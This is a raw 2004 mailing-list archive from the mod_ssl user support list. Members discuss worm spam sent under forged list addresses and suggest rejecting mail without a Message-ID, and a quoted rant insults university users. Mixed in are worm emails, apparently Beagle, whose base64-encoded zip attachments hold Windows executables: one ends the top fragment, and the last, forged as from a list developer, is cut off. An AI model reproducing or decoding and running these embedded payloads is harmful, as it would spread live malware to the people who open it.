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

----------iwomydnnncvdexwvwxwn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 19:00:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8A234A8A4F; Mon,  1 Mar 2004 19:00:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (193-194-157-34.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id 429AAA8A49
	for ; Mon,  1 Mar 2004 19:00:14 +0100 (CET)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.11.6+Sun/8.11.6) id i21Hxxm22638
	for ; Mon, 1 Mar 2004 18:59:59 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAACaGnS; Mon, 1 Mar 04 18:59:58 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.12.9/8.12.9/Debian-5) with ESMTP id i21HxtFI030273
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Mon, 1 Mar 2004 18:59:58 +0100
Message-ID: <40437A1B.7070209@trustcenter.de>
Date: Mon, 01 Mar 2004 18:59:55 +0100
From: Goetz Babin-Ebell 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: this list
References: <38200F24-6B96-11D8-B313-000A95C4667C@ghweb.com>  <20040301164757.GA12346@gw>
In-Reply-To: <20040301164757.GA12346@gw>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms020903080403090400050602"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Goetz Babin-Ebell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms020903080403090400050602
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hallo Mads,

Mads Toftum wrote:
> On Mon, Mar 01, 2004 at 10:49:18AM -0500, Kevin wrote:
> 
>>I am guessing that no one is able to block the mail from mmx.engelschall.com
>>on the modssl.org list?
>
> Since mmx.engelschall.com is part of the modssl/openssl mail infrastructure,
> that would effectively kill all mail to both modssl and openssl lists.

Since all these mails have no Message ID when they
are received at master.modssl.org, it seems to be a good Idea
to configure this host to refuse all mail (comming from the outside)
that has no message ID...

perhaps with a frienly error code
(like "go to hell evil spammer")


Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms020903080403090400050602
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIdDCC
BDYwggOfoAMCAQICDkI9AAAAApi3Ru4HXS8OMA0GCSqGSIb3DQEBBQUAMIG8MQswCQYDVQQG
EwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UEBxMHSGFtYnVyZzE6MDgGA1UEChMxVEMg
VHJ1c3RDZW50ZXIgZm9yIFNlY3VyaXR5IGluIERhdGEgTmV0d29ya3MgR21iSDEiMCAGA1UE
CxMZVEMgVHJ1c3RDZW50ZXIgQ2xhc3MgMyBDQTEpMCcGCSqGSIb3DQEJARYaY2VydGlmaWNh
dGVAdHJ1c3RjZW50ZXIuZGUwHhcNMDQwMjAzMTk0MjUwWhcNMDUwMjEwMTk0MjUwWjCBqjEL
MAkGA1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxGjAYBgNV
BAoTEVRDIFRydXN0Q2VudGVyIEFHMRQwEgYDVQQLEwtFbnR3aWNrbHVuZzEaMBgGA1UEAxMR
R29ldHogQmFiaW4tRWJlbGwxKTAnBgkqhkiG9w0BCQEWGmJhYmluLWViZWxsQHRydXN0Y2Vu
dGVyLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsHpp03oQKGukBtPkpXVx
5FEgMCgafPaCwGgUjYHAktL5Gm4hl90k56mbhyuDdfoteswrBIX+WyEV4etU+0vNpuAsbIVK
6Owk/TPe7t/hc1gIYeXhRvI+Rhugg/0YL8NG2ySc7Vh8lTL/jIoEbhWMngA/q9lMRB7LqObF
6WwrZ6Ti/BF9SOz/P1Rxma2PiKmIc/oioXLJ0NMtqufWNYdS7bMWcnOvJnqZd05Q+KEI4UYP
5zUoWSxnVWxyAOkrKBNBwiD9Ui2Zt4WSE6P0iRug7KJUq+9+G6OXGZ2b0AK3bYyMysHREBv1
NHUOBeXKh/DKQoAr4YzwK7yNwpomO9+FowIDAQABo4HGMIHDMAwGA1UdEwEB/wQCMAAwDgYD
VR0PAQH/BAQDAgXgMD4GCWCGSAGG+EIBCAQxFi9odHRwOi8vd3d3LnRydXN0Y2VudGVyLmRl
L2d1aWRlbGluZXMvaW5kZXguaHRtbDARBglghkgBhvhCAQEEBAMCBaAwUAYJYIZIAYb4QgED
BEMWQWh0dHBzOi8vbnJ1LnRjY2xhc3MzLnRydXN0Y2VudGVyLmRlLzQyM0QwMDAwMDAwMjk4
Qjc0NkVFMDc1RDJGMEU/MA0GCSqGSIb3DQEBBQUAA4GBAINELB1mtU/zCdszLBn9U9xXqH2T
lqg5+esIIQcCAsEgXXiNQ8qr/7tsg4dNSCtR1iC8Yy/i7pht1UPEVGcCMLeG6L6jsSSgeUtg
fbvFUfbFc42cVcEKKrCEI0QzdS7/3JWOd05xkf2m16xW4cKHee9rFNPXkY5UWQhIJWCGn+eO
MIIENjCCA5+gAwIBAgIOQj0AAAACmLdG7gddLw4wDQYJKoZIhvcNAQEFBQAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wNDAyMDMxOTQyNTBaFw0wNTAyMTAxOTQyNTBaMIGq
MQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UEBxMHSGFtYnVyZzEaMBgG
A1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdpY2tsdW5nMRowGAYDVQQD
ExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFiaW4tZWJlbGxAdHJ1c3Rj
ZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCwemnTehAoa6QG0+Sl
dXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsEhf5bIRXh61T7S82m4Cxs
hUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+MigRuFYyeAD+r2UxEHsuo
5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1LtsxZyc68mepl3TlD4oQjh
Rg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734bo5cZnZvQArdtjIzKwdEQ
G/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgcYwgcMwDAYDVR0TAQH/BAIwADAO
BgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93d3cudHJ1c3RjZW50ZXIu
ZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQEAwIFoDBQBglghkgBhvhC
AQMEQxZBaHR0cHM6Ly9ucnUudGNjbGFzczMudHJ1c3RjZW50ZXIuZGUvNDIzRDAwMDAwMDAy
OThCNzQ2RUUwNzVEMkYwRT8wDQYJKoZIhvcNAQEFBQADgYEAg0QsHWa1T/MJ2zMsGf1T3Feo
fZOWqDn56wghBwICwSBdeI1Dyqv/u2yDh01IK1HWILxjL+LumG3VQ8RUZwIwt4bovqOxJKB5
S2B9u8VR9sVzjZxVwQoqsIQjRDN1Lv/clY53TnGR/abXrFbhwod572sU09eRjlRZCEglYIaf
544xggR0MIIEcAIBATCBzzCBvDELMAkGA1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAO
BgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBp
biBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMg
Q0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmljYXRlQHRydXN0Y2VudGVyLmRlAg5CPQAAAAKY
t0buB10vDjAJBgUrDgMCGgUAoIICeTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqG
SIb3DQEJBTEPFw0wNDAzMDExNzU5NTVaMCMGCSqGSIb3DQEJBDEWBBRibbPMsqkIfkpzxLg0
o8bpuqeEVzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDAN
BggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDCB4AYJKwYBBAGCNxAEMYHS
MIHPMIG8MQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UEBxMHSGFtYnVy
ZzE6MDgGA1UEChMxVEMgVHJ1c3RDZW50ZXIgZm9yIFNlY3VyaXR5IGluIERhdGEgTmV0d29y
a3MgR21iSDEiMCAGA1UECxMZVEMgVHJ1c3RDZW50ZXIgQ2xhc3MgMyBDQTEpMCcGCSqGSIb3
DQEJARYaY2VydGlmaWNhdGVAdHJ1c3RjZW50ZXIuZGUCDkI9AAAAApi3Ru4HXS8OMIHiBgsq
hkiG9w0BCRACCzGB0qCBzzCBvDELMAkGA1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAO
BgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBp
biBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMg
Q0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmljYXRlQHRydXN0Y2VudGVyLmRlAg5CPQAAAAKY
t0buB10vDjANBgkqhkiG9w0BAQEFAASCAQA+LkdYrSq1MyzGrVsTJrZK0F5Uzv6yvE2LWdgl
bNZM8dRUvEVnwq/WBVzU4ERcMYg4Aw5LukBUjW7+5JkqiWk1w8SX8POqaYDi6bOSa7L/gx6Q
SN4FHQwKuqtGfeKSB/HyDSnVyOlU0BQfV2RJ8dLXuImcsWmhGWRFbxivBJVKGrIQ1LxyD6Ph
bElShhtUuerCYLUxjhK8Oj3uLPDCnW8RVYuik6BY+ZCDuVdTSbkzzrLIduwO8pzs2RK34u46
JVlo8OXDsPi+6WfFnnt2Te61x/hLdDElVc3gCZeath9kZpZIQKoll2YY6kjxDB6JOuQDsM07
s8F9nEdRvE/4hbxTAAAAAAAA
--------------ms020903080403090400050602--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 19:31:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7E910A8A4F; Mon,  1 Mar 2004 19:31:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 5ADC1A8A49
	for ; Mon,  1 Mar 2004 19:31:15 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 4DDD55E0243; Mon,  1 Mar 2004 19:31:18 +0100 (CET)
Date: Mon, 1 Mar 2004 19:31:18 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: this list
Message-ID: <20040301183118.GA12877@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <38200F24-6B96-11D8-B313-000A95C4667C@ghweb.com>  <20040301164757.GA12346@gw> <40437A1B.7070209@trustcenter.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <40437A1B.7070209@trustcenter.de>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Mar 01, 2004 at 06:59:55PM +0100, Goetz Babin-Ebell wrote:
> Since all these mails have no Message ID when they
> are received at master.modssl.org, it seems to be a good Idea
> to configure this host to refuse all mail (comming from the outside)
> that has no message ID...
> 
sure, that would certainly make sense.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 19:48:16 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5E7A2A8A53; Mon,  1 Mar 2004 19:48:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from POWELL.uanet.edu (mailmb3.uanet.edu [130.101.81.52])
	by master.modssl.org (Postfix) with ESMTP id E4455A8A49
	for ; Mon,  1 Mar 2004 19:48:03 +0100 (CET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
x-mimeole: Produced By Microsoft Exchange V6.0.6487.1
Subject: RE: Re[2]: rse has beagle-a virus ?
Date: Mon, 1 Mar 2004 13:48:01 -0500
Message-ID: <4EAB3F5D46284A408F6A998255B1188103206542@COMAL.uanet.edu>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Re[2]: rse has beagle-a virus ?
Thread-Index: AcP+ydJwfOZRPiQxRDaZyaiMuikOfwA8xTkQ
From: "Hunt,Keith A" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hunt,Keith A" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well now, this wins the award for the silliest rant I've heard for a
while.  I mean really, Dave... get a grip.

--=20
Keith Hunt  330.972.7968  keith@uakron.edu
Internet & Server Systems
The University of Akron=20

 =20

> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
> Sent: Saturday, February 28, 2004 7:25 AM
> To: modssl-users@modssl.org
> Subject: Re[2]: rse has beagle-a virus ?
>=20
> As I suspected, none of these messages originate from Ralf.  Just=20
> checking the original headers on the most recent batch of six I got=20
> overnight...
>=20
> from cruzeiro (cruzeiro.fisc.wwu.edu [140.160.220.200])=09
> by master.modssl.org
> from CLS-TORG1010-27 (torg1010-27.its.vt.edu=20
> [128.173.44.191])	by=20
> master.modssl.org
> from CLS-TORG1010-24 (torg1010-24.its.vt.edu=20
> [128.173.44.188])	by=20
> master.modssl.org
> from CLS-TORG1010-30 (torg1010-30.its.vt.edu=20
> [128.173.44.194])	by=20
> master.modssl.org
> from woofie (A052105.N1.Vanderbilt.Edu [129.59.52.105])=09
> by master.modssl.org
> from AdamBroughton (asdl00.ae.gatech.edu [130.207.39.100])	by=20
> master.modssl.org
>=20
> What this tells me is that someone realized the .edu addresses on the=20
> listserv were low hanging fruit.  Nice job.  Try partying=20
> less, studying=20
> more, and figure out how to keep yourself from being infected (on=20
> multiple fronts).  [aside:  pisses me off that I have to deal=20
> with spam=20
> from cracked/infected boxes from .edu domains ... I think I'm=20
> just going=20
> to reject all .edu-headered mail.  it's a hugely sad commentary that=20
> people from institutions of *higher* education can't grasp=20
> the concept=20
> of DON'T CLICK ON F^&KING ATTACHMENTS YOU'RE NOT EXPECING and USE A=20
> F#@KING A/V PACKAGE ALREADY, DAMNIT.  I mean really, people.. you're=20
> shelling out a TON of money and you don't seem to be one lick smarter=20
> than Jimmy Joe-Jobber's mom who'll click on everything and anything=20
> since getting her PC two weeks ago.  If you're as f%$king=20
> stupid as you=20
> appear to be, give it up .. save yourself the money and give=20
> your slot=20
> at school to someone else.  There no shame in doing manual=20
> labor for a=20
> living.  Society needs both ends of the spectrum.  If you=20
> can't figure=20
> out the "don't click" stuff, I have no idea what you're going=20
> to do with=20
> number theory or algorithms (assuming you're in a CS=20
> program).  I vote=20
> to kick the .edu's off the listserv until they prove they've got an=20
> intellectual agility quotient above that of a small soapdish.=20
>  If this=20
> pisses off admins for .edu's, sorry .. life's a bitch, grab a helmet.=20
> The rest of us out in the real world have to deal with [l]users like=20
> this and keep our networks clean for the rest of the planet -=20
> you're no=20
> different... you just have a harder job that I certainly don't envy.=20
> Perhaps instituting a "three strikes" policy for students ..=20
> the first=20
> infection gets you a warning .. the second gets you booted off the=20
> school's network .. the third (meaning you violated both the 2nd AND=20
> 1st) gets you booted from school.  Hrmm.. not a bad idea, I suppose.=20
> Anyway .. rant mode is now OFF.]
>=20
> Kind-ish Regards,
> -dsp :-)
> [...]
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 19:59:46 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88DF7A8A53; Mon,  1 Mar 2004 19:59:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id C7E6BA8A4B
	for ; Mon,  1 Mar 2004 19:59:33 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2004022400) with ESMTP id i21IxTKo009708
	for ; Mon, 1 Mar 2004 13:59:29 -0500 (EST)
Date: Mon, 1 Mar 2004 13:59:29 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: RE: Re[2]: rse has beagle-a virus ?
In-Reply-To: <4EAB3F5D46284A408F6A998255B1188103206542@COMAL.uanet.edu>
Message-ID: 
References: <4EAB3F5D46284A408F6A998255B1188103206542@COMAL.uanet.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 1 Mar 2004, Hunt,Keith A wrote:

> Well now, this wins the award for the silliest rant I've heard for a
> while.  I mean really, Dave... get a grip.

Seriously.

Not to mention that my primary email address is jwoolley@virginia.EDU.
But you know, feel free to block me if you like.  All the less stuff for
me to worry about.  ;)  hehe.  Here's a revolutionary little idea... if
you don't like spam and email worms... how about (gasp) installing
SpamAssassin and some antivirus software.  :-P

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 20:07:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A8A8A8A4F; Mon,  1 Mar 2004 20:07:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PG15664 (beacon.pgcc.edu [66.240.9.81])
	by master.modssl.org (Postfix) with SMTP id 8055AA8A53
	for ; Mon,  1 Mar 2004 20:07:24 +0100 (CET)
Date: Mon, 01 Mar 2004 14:07:22 -0500
To: modssl-users@modssl.org
Subject: Hello my friend
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wgiomoxkerotxlsjpsds"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wgiomoxkerotxlsjpsds
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Look it through

----------wgiomoxkerotxlsjpsds
Content-Type: application/octet-stream; name="aceeceeab.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badcb.zip"

UEsDBAoAAAAAAEBvYTCOrfmbI0QAACNEAAAMAAAAc211Y2xsbXguZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADOonn7isMXqIrDF6iKwxeoisMXqInDF6gE3ASousMXqGLcEqiLwxeoduMFqIvD
F6hNxRGoi8MXqFJpY2iKwxeoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQAAAAAA
AAAAAAAAAADgAA8BCwEAAAAOAAAAYAAAAAAAAACgAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA4AAAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAAAxogAA0QAAAACQAACgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAKwAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAgAAAAADgAAAAAAAAQNAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA
AABAAADAAAYAAAAAAACKBAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAwABSAAAAAAAA
9FQAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAKADAAAAkAAAAAQAAAAE
AAAAAAAAAAAAAAAAAQBAAADAAAAAAAAAAAAAQAAAAKAAAAA6AAAACAAAAAAAAAAAAAAAAAAA
QAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
